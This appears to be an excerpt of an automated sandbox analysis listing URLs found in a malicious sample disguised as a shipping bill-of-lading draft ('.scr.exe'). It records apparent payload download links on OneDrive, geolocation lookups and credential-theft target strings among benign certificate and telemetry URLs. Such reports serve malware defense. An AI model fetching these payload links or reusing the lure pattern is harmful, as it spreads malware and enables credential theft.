Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868530475.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1791549862.000000002754C000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp, bhv5415.tmp.36.dr	String found in binary or memory: http://geoplugin.net/json.gp
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868530475.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1791549862.000000002754C000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp&c2?
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpV
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp_
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpj
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0Q
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocspx.digicert.com0E
Source: xkn.exe, 0000000E.00000002.1720907085.000001F43AF95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834264521.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834180917.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834264521.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834180917.00000000005ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.comta
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865730661.0000000000193000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4094108405.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1791549862.000000002754C000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4110547668.00000000264F0000.00000004.00001000.00020000.00000000.sdmp, glrkszlG.pif, glrkszlG.pif, 00000001.00000000.1681332436.0000000000416000.00000002.00000001.01000000.00000005.sdmp, glrkszlG.pif, 00000001.00000002.1772834423.000000000044B000.00000040.00000400.00020000.00000000.sdmp, glrkszlG.pif, 00000001.00000002.1772834423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, glrkszlG.pif, 00000001.00000001.1681718586.0000000000418000.00000040.00000001.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1898092311.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1857638446.0000000002456000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1859693106.0000000002A20000.00000040.00001000.00020000.00000000.sdmp, glrkszlG.pif.0.dr	String found in binary or memory: http://www.pmail.com
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: xkn.exe, 0000000E.00000002.1720907085.000001F43AF49000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 0000000E.00000002.1720907085.000001F43AF6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://c6c4bq.db.files.1drv.com/_wR;
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680814338.0000000000971000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://c6c4bq.db.files.1drv.com/y4mMjDna1hFKlb3gcMt7CCWqdkVpW0DS9Rs52USyRQhNgPBhPdYAV7L6hMIv9WCXM5X
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://c6c4bq.db.files.1drv.com/y4muza8-AaN89J3KOPjgz4xuHsRw8GpbmeCTYrNNV8GxQvY6QuZ4f4Rksz00DRpN4rZ
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680814338.0000000000971000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://c6c4bq.db.files.1drv.com:443/y4mMjDna1hFKlb3gcMt7CCWqdkVpW0DS9Rs52USyRQhNgPBhPdYAV7L6hMIv9WC
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/d
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864575924.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
